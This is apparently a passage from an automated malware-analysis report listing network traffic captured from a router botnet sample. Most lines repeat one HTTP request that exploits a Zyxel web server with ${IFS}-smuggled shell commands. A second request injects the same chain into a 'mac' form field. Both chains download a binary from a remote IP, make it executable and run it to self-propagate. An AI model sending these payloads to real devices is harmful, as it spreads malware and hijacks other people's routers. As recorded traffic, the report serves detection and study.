          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: unknownDNS traffic detected: queries for: haha.skyljne.click
          Source: unknownHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CradlepointHTTPService/1.0.0Content-Type: text/html; charset=UTF-8Date: Sun, 28 Jan 2024 09:12:53 GMTContent-Length: 69Data Raw: 3c 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 34 30 33 3a 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 62 6f 64 79 3e 34 30 33 3a 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><title>403: Forbidden</title><body>403: Forbidden</body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CradlepointHTTPService/1.0.0Content-Type: text/html; charset=UTF-8Date: Sun, 28 Jan 2024 09:12:54 GMTContent-Length: 69Data Raw: 3c 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 34 30 33 3a 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 62 6f 64 79 3e 34 30 33 3a 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><title>403: Forbidden</title><body>403: Forbidden</body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: mini_httpd/1.19 19dec2003Date: Sun, 28 Jan 2024 09:13:32 GMTCache-Control: no-cache,no-storeContent-Type: text/html; charset=%sCache-Control: max-age=0Expires: Sun, 28 Jan 2024 09:13:32 GMTConnection: closeData Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 6e 69 5f 68 74 74 70 64 2f 22 3e 6d 69 6e 69 5f 68 74 74 70 64 2f 31 2e 31 39 20 31 39 64 65 63 32 30 30 33 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"><H4>404 Not Found</H4>File not found.<HR><ADDRESS><A HREF="http://www.acme.com/software/mini_httpd/">mini_httpd/1.19 19dec2003</A></ADDRESS></BODY></HTML>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: micro_httpdCache-Control: no-cacheDate: Sun, 28 Jan 2024 09:13:35 GMTContent-Type: text/htmlX-Frame-Options: SAMEORIGINConnection: closeData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>404 Not Found</H4>File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainContent-Length: 30Connection: close
